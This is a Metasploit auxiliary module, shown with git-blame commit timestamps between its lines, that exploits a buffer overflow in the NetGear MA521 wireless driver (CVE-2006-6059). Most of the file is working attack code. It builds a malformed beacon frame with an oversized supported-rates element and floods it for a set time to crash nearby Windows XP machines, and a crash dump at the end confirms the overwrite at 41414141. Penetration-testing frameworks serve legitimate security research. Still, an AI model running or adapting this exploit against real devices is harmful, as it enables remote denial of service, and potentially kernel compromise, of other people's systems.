2007-02-18 00:10:39 +00:00
|
|
|
##
|
2008-10-02 05:23:59 +00:00
|
|
|
# $Id$
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
|
|
|
|
|
##
|
2010-04-30 08:40:19 +00:00
|
|
|
# This file is part of the Metasploit Framework and may be subject to
|
2007-02-18 00:10:39 +00:00
|
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
2012-02-21 01:40:50 +00:00
|
|
|
# web site for more information on licensing and terms of use.
|
|
|
|
|
# http://metasploit.com/
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
|
2006-11-18 17:57:39 +00:00
|
|
|
require 'msf/core'
|
|
|
|
|
|
2008-10-02 05:23:59 +00:00
|
|
|
class Metasploit3 < Msf::Auxiliary
|
2006-11-18 17:57:39 +00:00
|
|
|
|
2009-10-23 15:59:13 +00:00
|
|
|
include Msf::Exploit::Lorcon2
|
2008-11-18 20:00:31 +00:00
|
|
|
include Msf::Auxiliary::Dos
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2006-11-18 17:57:39 +00:00
|
|
|
def initialize(info = {})
|
2010-04-30 08:40:19 +00:00
|
|
|
super(update_info(info,
|
2006-11-18 17:57:39 +00:00
|
|
|
'Name' => 'NetGear MA521 Wireless Driver Long Rates Overflow',
|
|
|
|
|
'Description' => %q{
|
|
|
|
|
This module exploits a buffer overflow in the NetGear MA521 wireless device
|
|
|
|
|
driver under Windows XP. When a specific malformed frame (beacon or probe response)
|
2010-04-30 08:40:19 +00:00
|
|
|
is received by the wireless interface under active scanning mode, the MA521nd5.SYS
|
2006-11-18 17:57:39 +00:00
|
|
|
driver attempts to write to an attacker-controlled memory location. The vulnerability
|
|
|
|
|
is triggered by an invalid supported rates information element.
|
2010-04-30 08:40:19 +00:00
|
|
|
|
|
|
|
|
This DoS was tested with version 5.148.724.2003 of the MA521nd5.SYS driver and a
|
2006-11-22 21:36:38 +00:00
|
|
|
NetGear MA521 Cardbus adapter. A remote code execution module is also in development.
|
2006-11-18 17:57:39 +00:00
|
|
|
|
2009-10-23 15:59:13 +00:00
|
|
|
This module depends on the Lorcon2 library and only works on the Linux platform
|
2010-04-30 08:40:19 +00:00
|
|
|
with a supported wireless card. Please see the Ruby Lorcon2 documentation
|
2006-11-18 17:57:39 +00:00
|
|
|
(external/ruby-lorcon/README) for more information.
|
|
|
|
|
},
|
|
|
|
|
'Author' => [ 'Laurent Butti <0x9090 [at] gmail.com>' ], # initial discovery and metasploit module
|
2010-05-03 17:13:09 +00:00
|
|
|
'Version' => '$Revision$',
|
2006-11-18 17:57:39 +00:00
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'References' =>
|
|
|
|
|
[
|
2010-04-25 14:52:44 +00:00
|
|
|
['CVE', '2006-6059'],
|
|
|
|
|
['OSVDB', '30507'],
|
2006-11-18 17:57:39 +00:00
|
|
|
['URL', 'http://projects.info-pull.com/mokb/MOKB-18-11-2006.html'],
|
|
|
|
|
['URL', 'ftp://downloads.netgear.com/files/ma521_1_2.zip']
|
2010-04-30 08:40:19 +00:00
|
|
|
]
|
2006-11-18 17:57:39 +00:00
|
|
|
))
|
|
|
|
|
register_options(
|
|
|
|
|
[
|
|
|
|
|
OptInt.new('RUNTIME', [ true, "The number of seconds to run the attack", 60]),
|
|
|
|
|
OptString.new('ADDR_DST', [ true, "The MAC address of the target system", 'FF:FF:FF:FF:FF:FF'])
|
2010-04-30 08:40:19 +00:00
|
|
|
], self.class)
|
2006-11-18 17:57:39 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def run
|
|
|
|
|
|
|
|
|
|
open_wifi
|
|
|
|
|
|
|
|
|
|
stime = Time.now.to_i
|
|
|
|
|
rtime = datastore['RUNTIME'].to_i
|
|
|
|
|
count = 0
|
|
|
|
|
|
|
|
|
|
print_status("Creating malicious beacon frame...")
|
|
|
|
|
|
|
|
|
|
frame = create_beacon()
|
|
|
|
|
|
|
|
|
|
print_status("Sending malicious beacon frames for #{datastore['RUNTIME']} seconds...")
|
|
|
|
|
|
|
|
|
|
while (stime + rtime > Time.now.to_i)
|
|
|
|
|
wifi.write(frame)
|
|
|
|
|
select(nil, nil, nil, 0.10) if (count % 100 == 0)
|
|
|
|
|
count += 1
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
print_status("Completed sending #{count} beacons.")
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def create_beacon
|
|
|
|
|
ssid = Rex::Text.rand_text(6)
|
|
|
|
|
bssid = Rex::Text.rand_text(6)
|
|
|
|
|
seq = [rand(255)].pack('n')
|
2010-04-30 08:40:19 +00:00
|
|
|
|
|
|
|
|
frame =
|
2006-11-18 17:57:39 +00:00
|
|
|
"\x80" + # type/subtype
|
|
|
|
|
"\x00" + # flags
|
2010-04-30 08:40:19 +00:00
|
|
|
"\x00\x00" + # duration
|
2006-11-18 17:57:39 +00:00
|
|
|
eton(datastore['ADDR_DST']) + # dst
|
|
|
|
|
bssid + # src
|
|
|
|
|
bssid + # bssid
|
2010-04-30 08:40:19 +00:00
|
|
|
seq + # seq
|
2006-11-18 17:57:39 +00:00
|
|
|
Rex::Text.rand_text(8) + # timestamp value
|
|
|
|
|
"\x64\x00" + # beacon interval
|
|
|
|
|
"\x01\x00" + # capabilities
|
|
|
|
|
|
|
|
|
|
# ssid IE
|
|
|
|
|
"\x00" + ssid.length.chr + ssid +
|
|
|
|
|
|
|
|
|
|
# supported rates IE overflow
|
|
|
|
|
"\x01" + "\xFF" + ("\x41" * 255) +
|
|
|
|
|
|
|
|
|
|
# channel IE
|
|
|
|
|
"\x03" + "\x01" + channel.chr
|
2010-04-30 08:40:19 +00:00
|
|
|
|
2006-11-18 17:57:39 +00:00
|
|
|
return frame
|
|
|
|
|
|
|
|
|
|
end
|
|
|
|
|
end
|
2006-11-22 21:36:38 +00:00
|
|
|
|
|
|
|
|
=begin
|
|
|
|
|
*******************************************************************************
|
|
|
|
|
* *
|
|
|
|
|
* Bugcheck Analysis *
|
|
|
|
|
* *
|
|
|
|
|
*******************************************************************************
|
|
|
|
|
|
|
|
|
|
DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1)
|
|
|
|
|
An attempt was made to access a pageable (or completely invalid) address at an
|
|
|
|
|
interrupt request level (IRQL) that is too high. This is usually
|
|
|
|
|
caused by drivers using improper addresses.
|
|
|
|
|
If kernel debugger is available get stack backtrace.
|
|
|
|
|
Arguments:
|
|
|
|
|
Arg1: 41414141, memory referenced
|
|
|
|
|
Arg2: 00000002, IRQL
|
|
|
|
|
Arg3: 00000000, value 0 = read operation, 1 = write operation
|
|
|
|
|
Arg4: aa1ec75a, address which referenced memory
|
2008-11-18 20:00:31 +00:00
|
|
|
=end
|
